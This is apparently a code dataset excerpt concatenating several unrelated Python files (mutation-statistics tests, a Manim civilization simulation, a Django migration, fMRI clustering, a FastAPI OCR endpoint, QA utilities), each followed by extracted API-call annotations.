'ovos_utils.log.LOG.exception', 'LOG.exception', (['e'], {}), '(e)\n', (3106, 3109), False, 'from ovos_utils.log import LOG\n')] |
# fix problems with pythons terrible import system
import os
import sys
file_dir = os.path.dirname(os.path.realpath(__file__))
#sys.path.append(os.path.join(file_dir, '../bin/'))
sys.path.append(os.path.join(file_dir, '..'))
import prob2020.console.randomization_test as pt
import prob2020.python.utils as utils
import prob2020.python.mutation_context as mc
import numpy as np
def test_ctnnb1_main():
opts = {'input': os.path.join(file_dir, 'data/CTNNB1.fa'),
'bed': os.path.join(file_dir, 'data/CTNNB1.bed'),
'mutations': os.path.join(file_dir, 'data/CTNNB1_mutations.txt'),
'output': os.path.join(file_dir, 'output/CTNNB1_output.txt'),
'context': 1,
'use_unmapped': False,
'tsg_score': .1,
'recurrent': 3,
'fraction': .02,
'score_dir': os.path.join(file_dir, 'data/scores'),
'processes': 0,
'num_iterations': 10000,
'stop_criteria': 100,
'recurrent_pseudo_count': 0,
'unique': 0,
'seed': None,
'kind': 'oncogene'}
# single nucleotide context
result = pt.main(opts)
assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2])
# di-nucleotide case
opts['context'] = 2
result = pt.main(opts)
assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2])
# no context case
opts['context'] = 0
result = pt.main(opts)
assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2])
def test_ctnnb1_get_aa_mut_info():
import pysam
from prob2020.python.gene_sequence import GeneSequence
# read fasta
ctnnb1_fasta = os.path.join(file_dir, 'data/CTNNB1.fa')
gene_fa = pysam.Fastafile(ctnnb1_fasta)
gs = GeneSequence(gene_fa, nuc_context=1)
# read CTNNB1 bed file
ctnnb1_bed = os.path.join(file_dir, 'data/CTNNB1.bed')
bed_list = [b for b in utils.bed_generator(ctnnb1_bed)]
gs.set_gene(bed_list[0])
# specify mutation
coding_pos = [0]
somatic_base = ['C']
# check mutation info
aa_info = mc.get_aa_mut_info(coding_pos, somatic_base, gs)
ref_codon_msg = 'First codon should be start codon ({0})'.format(aa_info['Reference Codon'][0])
assert aa_info['Reference Codon'][0] == 'ATG', ref_codon_msg
assert aa_info['Somatic Codon'][0] == 'CTG', 'First "A" should be replaced with a "C"'
assert aa_info['Codon Pos'][0] == 0, 'Start codon should be position 0'
def test_100genes_main():
opts = {'input': os.path.join(file_dir, 'data/100genes.fa'),
'bed': os.path.join(file_dir, 'data/100genes.bed'),
'mutations': os.path.join(file_dir, 'data/100genes_mutations.txt'),
'output': os.path.join(file_dir, 'output/100genes_position_single_nuc_output.txt'),
'context': 1,
'tsg_score': .1,
'recurrent': 3,
'fraction': .02,
'use_unmapped': False,
'processes': 0,
'num_iterations': 1000,
'stop_criteria': 100,
'score_dir': os.path.join(file_dir, 'data/scores'),
'recurrent_pseudo_count': 0,
'unique': False,
'seed': None,
'kind': 'oncogene'}
# single nucleotide context
result = pt.main(opts)
#tested_result = result[result['Performed Recurrency Test']==1]
num_ent_sig = np.sum(result['entropy BH q-value'] < .1)
assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig)
# no context case
opts['context'] = 0
opts['output'] = os.path.join(file_dir, 'output/100genes_position_no_context_output.txt')
result = pt.main(opts)
#tested_result = result[result['Performed Recurrency Test']==1]
num_ent_sig = np.sum(result['entropy BH q-value'] < .1)
assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig)
# di-nucleotide context
opts['context'] = 2
opts['output'] = os.path.join(file_dir, 'output/100genes_position_dinuc_output.txt')
result = pt.main(opts)
#tested_result = result[result['Performed Recurrency Test']==1]
num_ent_sig = np.sum(result['entropy BH q-value'] < .1)
assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig)
if __name__ == '__main__':
test_100genes_main()
| [
"pysam.Fastafile",
"prob2020.console.randomization_test.main",
"os.path.join",
"os.path.realpath",
"numpy.sum",
"prob2020.python.mutation_context.get_aa_mut_info",
"prob2020.python.utils.bed_generator",
"prob2020.python.gene_sequence.GeneSequence"
] | [((99, 125), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (115, 125), False, 'import os\n'), ((195, 223), 'os.path.join', 'os.path.join', (['file_dir', '""".."""'], {}), "(file_dir, '..')\n", (207, 223), False, 'import os\n'), ((1160, 1173), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1167, 1173), True, 'import prob2020.console.randomization_test as pt\n'), ((1361, 1374), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1368, 1374), True, 'import prob2020.console.randomization_test as pt\n'), ((1559, 1572), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1566, 1572), True, 'import prob2020.console.randomization_test as pt\n'), ((1847, 1887), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.fa"""'], {}), "(file_dir, 'data/CTNNB1.fa')\n", (1859, 1887), False, 'import os\n'), ((1902, 1931), 'pysam.Fastafile', 'pysam.Fastafile', (['ctnnb1_fasta'], {}), '(ctnnb1_fasta)\n', (1917, 1931), False, 'import pysam\n'), ((1941, 1977), 'prob2020.python.gene_sequence.GeneSequence', 'GeneSequence', (['gene_fa'], {'nuc_context': '(1)'}), '(gene_fa, nuc_context=1)\n', (1953, 1977), False, 'from prob2020.python.gene_sequence import GeneSequence\n'), ((2023, 2064), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.bed"""'], {}), "(file_dir, 'data/CTNNB1.bed')\n", (2035, 2064), False, 'import os\n'), ((2265, 2313), 'prob2020.python.mutation_context.get_aa_mut_info', 'mc.get_aa_mut_info', (['coding_pos', 'somatic_base', 'gs'], {}), '(coding_pos, somatic_base, gs)\n', (2283, 2313), True, 'import prob2020.python.mutation_context as mc\n'), ((3462, 3475), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (3469, 3475), True, 'import prob2020.console.randomization_test as pt\n'), ((3562, 3604), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (3568, 3604), True, 'import numpy as np\n'), ((3780, 3852), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_no_context_output.txt"""'], {}), "(file_dir, 'output/100genes_position_no_context_output.txt')\n", (3792, 3852), False, 'import os\n'), ((3866, 3879), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (3873, 3879), True, 'import prob2020.console.randomization_test as pt\n'), ((3966, 4008), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (3972, 4008), True, 'import numpy as np\n'), ((4190, 4257), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_dinuc_output.txt"""'], {}), "(file_dir, 'output/100genes_position_dinuc_output.txt')\n", (4202, 4257), False, 'import os\n'), ((4271, 4284), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (4278, 4284), True, 'import prob2020.console.randomization_test as pt\n'), ((4371, 4413), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (4377, 4413), True, 'import numpy as np\n'), ((425, 465), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.fa"""'], {}), "(file_dir, 'data/CTNNB1.fa')\n", (437, 465), False, 'import os\n'), ((486, 527), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.bed"""'], {}), "(file_dir, 'data/CTNNB1.bed')\n", (498, 527), False, 'import os\n'), ((554, 605), 'os.path.join', 
'os.path.join', (['file_dir', '"""data/CTNNB1_mutations.txt"""'], {}), "(file_dir, 'data/CTNNB1_mutations.txt')\n", (566, 605), False, 'import os\n'), ((629, 679), 'os.path.join', 'os.path.join', (['file_dir', '"""output/CTNNB1_output.txt"""'], {}), "(file_dir, 'output/CTNNB1_output.txt')\n", (641, 679), False, 'import os\n'), ((853, 890), 'os.path.join', 'os.path.join', (['file_dir', '"""data/scores"""'], {}), "(file_dir, 'data/scores')\n", (865, 890), False, 'import os\n'), ((2696, 2738), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes.fa"""'], {}), "(file_dir, 'data/100genes.fa')\n", (2708, 2738), False, 'import os\n'), ((2759, 2802), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes.bed"""'], {}), "(file_dir, 'data/100genes.bed')\n", (2771, 2802), False, 'import os\n'), ((2829, 2882), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes_mutations.txt"""'], {}), "(file_dir, 'data/100genes_mutations.txt')\n", (2841, 2882), False, 'import os\n'), ((2906, 2978), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_single_nuc_output.txt"""'], {}), "(file_dir, 'output/100genes_position_single_nuc_output.txt')\n", (2918, 2978), False, 'import os\n'), ((3250, 3287), 'os.path.join', 'os.path.join', (['file_dir', '"""data/scores"""'], {}), "(file_dir, 'data/scores')\n", (3262, 3287), False, 'import os\n'), ((2092, 2123), 'prob2020.python.utils.bed_generator', 'utils.bed_generator', (['ctnnb1_bed'], {}), '(ctnnb1_bed)\n', (2111, 2123), True, 'import prob2020.python.utils as utils\n')] |
from manim import *
import Galaxy
from array import array
class DarkForest(Scene):
def construct(self):
        '''Recommended X:Y ratio is 7:4'''
GalSizeX = 35
GalSizeY = 20
GalCivilizations = 20
# reduce animation time
simple = True
self.Universe = Galaxy.Galaxy(GalSizeX, GalSizeY, GalCivilizations)
self.year = Text('')
self.txts = VGroup()
self.lines = VGroup()
self.CivLabels = {}
self.conveys = []
TConstantX = 7.0/GalSizeX
TConstantY = 7.0/GalSizeY
self.CivGroup = {}
self.updateAge()
self.initCivs(simple=simple)
self.initIR(simple=simple)
self.label()
# Begin Galaxy Development
while not self.Universe.end():
self.Universe.move()
# self.drawConvey()
for i in self.Universe.New:
self.addCiv(i)
self.Universe.New = []
self.drawRelations()
self.updateAge()
self.checkChangeAttitude()
self.drawIR()
self.checkDead()
# print(CivGroup)
self.ending()
# def drawConvey(self):
# for i in self.conveys:
# self.remove(i)
# self.conveys.remove(i)
# for civ in self.Universe.Civilizations:
# for i in civ.Conveys:
# if i.Distance >0:
# if i.Friend:
# c = ImageMobject('conveygreen.png')
# c.rotate((i.Angle-90)*DEGREES)
# c.move_to(i.transformCoord())
# c.scale(0.1)
# self.add(c)
# self.conveys.append(c)
# else:
# c = ImageMobject('conveyred.png')
# c.rotate((i.Angle-90)*DEGREES)
# c.move_to(i.transformCoord())
# c.scale(0.1)
# self.add(c)
# print(i.Rad)
# self.conveys.append(c)
def addCiv(self, civ):
self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05))
if civ.Attitude == 1:
self.CivGroup[civ][0].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][0].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][0].set_color(YELLOW)
else:
self.CivGroup[civ][0].set_color(GREY)
self.play(FadeIn(self.CivGroup[civ][0]))
self.wait(0.1)
self.play(ApplyMethod(self.CivGroup[civ][0].shift, civ.transformCoord()), run_time=1)
IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1)
self.CivGroup[civ].add(IR)
IR.move_to(civ.transformCoord())
if civ.Attitude == 1:
self.CivGroup[civ][1].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][1].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][1].set_color(YELLOW)
else:
self.CivGroup[civ][1].set_color(GREY)
self.play(Create(IR))
a = civ.Name[4:]
print(a)
try:
t = Text(a)
except Exception:
t = Text('No. ????')
t.scale(0.2)
t.next_to(self.CivGroup[civ][0], direction=RIGHT, )
self.add(t)
self.CivLabels[civ] = t
self.txts.add(t)
def drawRelations(self):
# self.play(FadeOut(self.lines))
        # iterate over a copy; removing items from self.lines while iterating over it skips entries
        for i in list(self.lines):
self.remove(i)
self.lines.remove(i)
for civ in self.Universe.Civilizations:
for war in civ.War:
l = Line(civ.transformCoord(), war.transformCoord(), stroke_width=0.8).set_color(RED)
self.lines.add(l)
self.add(l)
for ally in civ.Ally:
l = Line(civ.transformCoord(), ally.transformCoord(), stroke_width=0.8).set_color(GREEN)
self.lines.add(l)
self.add(l)
def ending(self):
self.play(FadeOut(self.txts))
self.play(FadeOut(self.lines))
self.remove(self.txts)
for civ in self.Universe.Civilizations:
self.play(FadeOut(self.CivGroup[civ]))
self.remove(self.CivGroup[civ])
civ = self.Universe.Civilizations[0]
self.WIN = Dot(radius=1)
if civ.Attitude == 1:
self.WIN.set_color(GREEN)
elif civ.Attitude == 2:
self.WIN.set_color(RED)
elif civ.Attitude == 3:
self.WIN.set_color(YELLOW)
else:
self.WIN.set_color(GREY)
self.play(FadeIn(self.WIN))
self.wait(2)
info = Text(f'{civ.Name}\nTech: {civ.Tech}\nPower: {round(civ.Power, 2)}\nAttitude: {civ.Attitude}')
info.scale(0.8)
self.play(ApplyMethod(self.WIN.move_to, LEFT*2.5), run_time=1)
info.next_to(self.WIN, direction=RIGHT, )
self.play(FadeIn(info))
self.wait(4)
self.play(FadeOut(info), FadeOut(self.WIN))
self.galaxyStats()
def galaxyStats(self):
logo = ImageMobject('galaxy.png', invert=True)
logo.scale(0.4)
t = ''
for i in self.Universe.Stats.keys():
t+= str(i)+': '+str(round(self.Universe.Stats[i],2))+'\n'
info = Text(t)
info.scale(0.8)
self.play(FadeIn(logo))
self.play(ApplyMethod(logo.move_to, LEFT*2))
info.next_to(logo, direction=RIGHT)
self.play(FadeIn(info))
self.wait()
def checkDead(self):
if(len(self.Universe.Dead)>0):
            # iterate over a copy so that removing from Universe.Dead inside the loop is safe
            for civ in list(self.Universe.Dead):
self.play(FadeOut(self.CivGroup[civ][0]), FadeOut(self.CivGroup[civ][1]), FadeOut(self.CivLabels[civ]))
self.remove(self.CivGroup[civ])
self.CivGroup.pop(civ)
self.Universe.Dead.remove(civ)
def updateAge(self):
past = self.year
self.remove(past)
self.year = Text(f"{self.Universe.age*10}", aligned_edge=LEFT).set_color(WHITE)
self.year.shift(LEFT*6+UP*3)
self.add(self.year)
def checkChangeAttitude(self):
for civ in self.Universe.Civilizations:
if civ.Attitude == 1:
self.CivGroup[civ][0].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][0].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][0].set_color(YELLOW)
else:
self.CivGroup[civ][0].set_color(GREY)
def label(self):
for civ in self.Universe.Civilizations:
a = civ.Name[4:]
print(a)
try:
t = Text(a)
except Exception:
t = Text('No. ????')
t.scale(0.2)
# t.move_to(civ.transformCoord()+RIGHT*0.4)
t.next_to(self.CivGroup[civ][0], direction=RIGHT, )
self.add(t)
self.CivLabels[civ] = t
self.txts.add(t)
def drawIR(self):
for civ in self.Universe.Civilizations:
IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1)
past = self.CivGroup[civ][1]
self.CivGroup[civ].remove(past)
self.remove(past)
self.CivGroup[civ].add(IR)
IR.move_to(civ.transformCoord())
if civ.Attitude == 1:
self.CivGroup[civ][1].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][1].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][1].set_color(YELLOW)
else:
self.CivGroup[civ][1].set_color(GREY)
self.add(IR)
# self.wait(0.5)
self.wait()
def initIR(self, simple=False):
for civ in self.Universe.Civilizations:
IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1)
self.CivGroup[civ].add(IR)
IR.move_to(civ.transformCoord())
if civ.Attitude == 1:
self.CivGroup[civ][1].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][1].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][1].set_color(YELLOW)
else:
self.CivGroup[civ][1].set_color(GREY)
if not simple:
self.play(Create(IR))
else:
self.add(IR)
# self.wait(0.5)
self.wait()
def initCivs(self,simple=False):
if not simple:
for civ in self.Universe.Civilizations:
self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05))
if civ.Attitude == 1:
self.CivGroup[civ][0].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][0].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][0].set_color(YELLOW)
else:
self.CivGroup[civ][0].set_color(GREY)
self.play(FadeIn(self.CivGroup[civ][0]))
self.play(ApplyMethod(self.CivGroup[civ][0].move_to, civ.transformCoord()), )
# self.wait(0.1)
self.wait(1)
else:
for civ in self.Universe.Civilizations:
self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05))
if civ.Attitude == 1:
self.CivGroup[civ][0].set_color(GREEN)
elif civ.Attitude == 2:
self.CivGroup[civ][0].set_color(RED)
elif civ.Attitude == 3:
self.CivGroup[civ][0].set_color(YELLOW)
else:
self.CivGroup[civ][0].set_color(GREY)
self.CivGroup[civ][0].move_to(civ.transformCoord())
self.add(self.CivGroup[civ][0])
# Contruct Universe with initial Civilizations
# for i in Universe.Civilizations:
# CivDot[i] = Dot(point=[i.X, i.Y, 0], radius=0.08, )
# self.play(FadeIn(CivDot[i]))
| [
"Galaxy.Galaxy"
] | [((254, 305), 'Galaxy.Galaxy', 'Galaxy.Galaxy', (['GalSizeX', 'GalSizeY', 'GalCivilizations'], {}), '(GalSizeX, GalSizeY, GalCivilizations)\n', (267, 305), False, 'import Galaxy\n')] |
# Generated by Django 3.0 on 2020-12-05 01:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('register', '0017_auto_20201204_1939'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='profile_pic',
field=models.ImageField(blank=True, default='profile_images/blank-profile-picture-png.png', null=True, upload_to='profile_images/'),
),
]
| [
"django.db.models.ImageField"
] | [((345, 480), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'default': '"""profile_images/blank-profile-picture-png.png"""', 'null': '(True)', 'upload_to': '"""profile_images/"""'}), "(blank=True, default=\n 'profile_images/blank-profile-picture-png.png', null=True, upload_to=\n 'profile_images/')\n", (362, 480), False, 'from django.db import migrations, models\n')] |
from __future__ import absolute_import, division, print_function
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "functions"))
import time as time
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
from sklearn.feature_extraction.image import grid_to_graph
from sklearn.cluster import AgglomerativeClustering
from Image_Visualizing import present_3d, make_mask
# Relative path to subject 1 data
pathtodata = "../../../data/ds009/sub001/"
condition_location=pathtodata+"model/model001/onsets/task001_run001/"
location_of_images="../../../images/"
sys.path.append(os.path.join(os.path.dirname(__file__), "../functions/"))
data = np.load('cluster_mask.npy')
data_new = data[..., 10:13]
X = np.reshape(data_new, (-1, 1))
connectivity = grid_to_graph(n_x= data_new.shape[0], n_y = data_new.shape[1], n_z = data_new.shape[2])
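# the connectivity graph restricts Ward merges to spatially adjacent voxels in the 3D volume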
st = time.time()
n_clusters = 7 # number of regions
ward = AgglomerativeClustering(n_clusters=n_clusters,
linkage='ward', connectivity=connectivity).fit(X)
label = np.reshape(ward.labels_, data_new.shape)
label_mean = np.zeros(n_clusters)
center = list()
#FIND THE AVERAGE T-VALUE PER CLUSTER
for j in range(n_clusters):
mask = label==j
index = np.where(mask)
center.append((np.mean(index[0]),np.mean(index[1]),np.mean(index[2])))
label_mean[j] =np.mean(data_new[mask])
#PRINT THE PLOTS
for i in range(data_new.shape[-1]):
plt.figure()
plt.imshow(data_new[...,i], cmap=plt.cm.gray)
for l in range(n_clusters):
plt.contour(label[...,i] == l, contours=1,
colors=[plt.cm.spectral(l / float(n_clusters)), ],linewidths= 0.4)
plt.xticks(())
plt.yticks(())
plt.savefig(location_of_images+"ward"+str(i)+'.png')
| [
"matplotlib.pyplot.imshow",
"numpy.mean",
"sklearn.cluster.AgglomerativeClustering",
"numpy.reshape",
"matplotlib.pyplot.xticks",
"sklearn.feature_extraction.image.grid_to_graph",
"numpy.where",
"os.path.dirname",
"numpy.zeros",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.yticks",
"numpy.load",
"time.time"
] | [((687, 714), 'numpy.load', 'np.load', (['"""cluster_mask.npy"""'], {}), "('cluster_mask.npy')\n", (694, 714), True, 'import numpy as np\n'), ((749, 778), 'numpy.reshape', 'np.reshape', (['data_new', '(-1, 1)'], {}), '(data_new, (-1, 1))\n', (759, 778), True, 'import numpy as np\n'), ((795, 882), 'sklearn.feature_extraction.image.grid_to_graph', 'grid_to_graph', ([], {'n_x': 'data_new.shape[0]', 'n_y': 'data_new.shape[1]', 'n_z': 'data_new.shape[2]'}), '(n_x=data_new.shape[0], n_y=data_new.shape[1], n_z=data_new.\n shape[2])\n', (808, 882), False, 'from sklearn.feature_extraction.image import grid_to_graph\n'), ((889, 900), 'time.time', 'time.time', ([], {}), '()\n', (898, 900), True, 'import time as time\n'), ((1056, 1096), 'numpy.reshape', 'np.reshape', (['ward.labels_', 'data_new.shape'], {}), '(ward.labels_, data_new.shape)\n', (1066, 1096), True, 'import numpy as np\n'), ((1111, 1131), 'numpy.zeros', 'np.zeros', (['n_clusters'], {}), '(n_clusters)\n', (1119, 1131), True, 'import numpy as np\n'), ((1247, 1261), 'numpy.where', 'np.where', (['mask'], {}), '(mask)\n', (1255, 1261), True, 'import numpy as np\n'), ((1356, 1379), 'numpy.mean', 'np.mean', (['data_new[mask]'], {}), '(data_new[mask])\n', (1363, 1379), True, 'import numpy as np\n'), ((1441, 1453), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1451, 1453), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1504), 'matplotlib.pyplot.imshow', 'plt.imshow', (['data_new[..., i]'], {'cmap': 'plt.cm.gray'}), '(data_new[..., i], cmap=plt.cm.gray)\n', (1468, 1504), True, 'import matplotlib.pyplot as plt\n'), ((1670, 1684), 'matplotlib.pyplot.xticks', 'plt.xticks', (['()'], {}), '(())\n', (1680, 1684), True, 'import matplotlib.pyplot as plt\n'), ((1689, 1703), 'matplotlib.pyplot.yticks', 'plt.yticks', (['()'], {}), '(())\n', (1699, 1703), True, 'import matplotlib.pyplot as plt\n'), ((115, 140), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (130, 140), False, 'import os\n'), ((633, 658), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (648, 658), False, 'import os\n'), ((943, 1037), 'sklearn.cluster.AgglomerativeClustering', 'AgglomerativeClustering', ([], {'n_clusters': 'n_clusters', 'linkage': '"""ward"""', 'connectivity': 'connectivity'}), "(n_clusters=n_clusters, linkage='ward', connectivity\n =connectivity)\n", (966, 1037), False, 'from sklearn.cluster import AgglomerativeClustering\n'), ((1281, 1298), 'numpy.mean', 'np.mean', (['index[0]'], {}), '(index[0])\n', (1288, 1298), True, 'import numpy as np\n'), ((1299, 1316), 'numpy.mean', 'np.mean', (['index[1]'], {}), '(index[1])\n', (1306, 1316), True, 'import numpy as np\n'), ((1317, 1334), 'numpy.mean', 'np.mean', (['index[2]'], {}), '(index[2])\n', (1324, 1334), True, 'import numpy as np\n')] |
from fastapi import FastAPI, File, Depends, HTTPException
from pydantic import BaseModel, Field
import base64
import time
from recognize_service import RecognizeService
app = FastAPI()
class Base64Body(BaseModel):
b64Encoded: str = Field(..., title="Image encoded in Base64")
def get_numbers(file: bytes, recognize_service: RecognizeService):
start_time = time.time()
try:
lp_number, links = recognize_service.get_license_plate_number(file)
except Exception as e:
print(e)
raise HTTPException(
status_code=422, detail="Could not get license plate number"
)
end_time = time.time()
print("Time: ", end_time - start_time)
return {"licensePlateNumber": lp_number, "links": links}
def process_image_raw(
file: bytes = File(...),
recognize_service: RecognizeService = Depends(),
):
return get_numbers(file, recognize_service)
def process_image_base64(
b64: Base64Body,
recognize_service: RecognizeService = Depends(),
):
file = base64.b64decode(b64.b64Encoded)
return get_numbers(file, recognize_service)
@app.post("/ocr/base64")
async def recognize_characters_from_base64(
process_image: dict = Depends(process_image_base64),
):
return process_image
@app.post("/ocr/raw")
async def recognize_characters_from_raw_image(
process_image: dict = Depends(process_image_raw),
):
return process_image
@app.get("/")
async def healthcheck():
return "ok"
| [
"fastapi.FastAPI",
"fastapi.HTTPException",
"pydantic.Field",
"base64.b64decode",
"time.time",
"fastapi.File",
"fastapi.Depends"
] | [((177, 186), 'fastapi.FastAPI', 'FastAPI', ([], {}), '()\n', (184, 186), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((240, 283), 'pydantic.Field', 'Field', (['...'], {'title': '"""Image encoded in Base64"""'}), "(..., title='Image encoded in Base64')\n", (245, 283), False, 'from pydantic import BaseModel, Field\n'), ((370, 381), 'time.time', 'time.time', ([], {}), '()\n', (379, 381), False, 'import time\n'), ((638, 649), 'time.time', 'time.time', ([], {}), '()\n', (647, 649), False, 'import time\n'), ((798, 807), 'fastapi.File', 'File', (['...'], {}), '(...)\n', (802, 807), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((851, 860), 'fastapi.Depends', 'Depends', ([], {}), '()\n', (858, 860), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1004, 1013), 'fastapi.Depends', 'Depends', ([], {}), '()\n', (1011, 1013), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1029, 1061), 'base64.b64decode', 'base64.b64decode', (['b64.b64Encoded'], {}), '(b64.b64Encoded)\n', (1045, 1061), False, 'import base64\n'), ((1207, 1236), 'fastapi.Depends', 'Depends', (['process_image_base64'], {}), '(process_image_base64)\n', (1214, 1236), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((1363, 1389), 'fastapi.Depends', 'Depends', (['process_image_raw'], {}), '(process_image_raw)\n', (1370, 1389), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n'), ((525, 600), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(422)', 'detail': '"""Could not get license plate number"""'}), "(status_code=422, detail='Could not get license plate number')\n", (538, 600), False, 'from fastapi import FastAPI, File, Depends, HTTPException\n')] |
import argparse
from datetime import datetime
from os.path import join
from typing import List, TypeVar, Iterable
from docqa.data_processing.word_vectors import load_word_vectors
class ResourceLoader(object):
"""
Abstraction for models the need access to external resources to setup, currently just
for word-vectors.
"""
def __init__(self, load_vec_fn=load_word_vectors):
self.load_vec_fn = load_vec_fn
def load_word_vec(self, vec_name, voc=None):
return self.load_vec_fn(vec_name, voc)
class LoadFromPath(object):
def __init__(self, path):
self.path = path
def load_word_vec(self, vec_name, voc=None):
return load_word_vectors(join(self.path, vec_name), voc, True)
class CachingResourceLoader(ResourceLoader):
def __init__(self, load_vec_fn=load_word_vectors):
super().__init__(load_vec_fn)
self.word_vec = {}
def load_word_vec(self, vec_name, voc=None):
if vec_name not in self.word_vec:
self.word_vec[vec_name] = super().load_word_vec(vec_name)
return self.word_vec[vec_name]
def print_table(table: List[List[str]]):
""" Print the lists with evenly spaced columns """
# print while padding each column to the max column length
col_lens = [0] * len(table[0])
for row in table:
for i,cell in enumerate(row):
col_lens[i] = max(len(cell), col_lens[i])
formats = ["{0:<%d}" % x for x in col_lens]
for row in table:
print(" ".join(formats[i].format(row[i]) for i in range(len(row))))
T = TypeVar('T')
def transpose_lists(lsts: List[List[T]]) -> List[List[T]]:
return [list(i) for i in zip(*lsts)]
def max_or_none(a, b):
if a is None or b is None:
return None
return max(a, b)
def flatten_iterable(listoflists: Iterable[Iterable[T]]) -> List[T]:
return [item for sublist in listoflists for item in sublist]
def split(lst: List[T], n_groups) -> List[List[T]]:
""" partition `lst` into `n_groups` that are as evenly sized as possible """
per_group = len(lst) // n_groups
remainder = len(lst) % n_groups
groups = []
ix = 0
for _ in range(n_groups):
group_size = per_group
if remainder > 0:
remainder -= 1
group_size += 1
groups.append(lst[ix:ix + group_size])
ix += group_size
return groups
def group(lst: List[T], max_group_size) -> List[List[T]]:
""" partition `lst` into that the mininal number of groups that as evenly sized
as possible and are at most `max_group_size` in size """
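    # e.g. group([1, 2, 3, 4, 5], max_group_size=2) -> [[1, 2], [3, 4], [5]]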
if max_group_size is None:
return [lst]
n_groups = (len(lst)+max_group_size-1) // max_group_size
per_group = len(lst) // n_groups
remainder = len(lst) % n_groups
groups = []
ix = 0
for _ in range(n_groups):
group_size = per_group
if remainder > 0:
remainder -= 1
group_size += 1
groups.append(lst[ix:ix + group_size])
ix += group_size
return groups
def get_output_name_from_cli():
parser = argparse.ArgumentParser(description='')
    parser.add_argument('--name', '-n', nargs=1, help='name of output to examine')
args = parser.parse_args()
if args.name:
out = join(args.name[0] + "-" + datetime.now().strftime("%m%d-%H%M%S"))
print("Starting run on: " + out)
else:
out = "out/run-" + datetime.now().strftime("%m%d-%H%M%S")
print("Starting run on: " + out)
return out
| [
"datetime.datetime.now",
"os.path.join",
"argparse.ArgumentParser",
"typing.TypeVar"
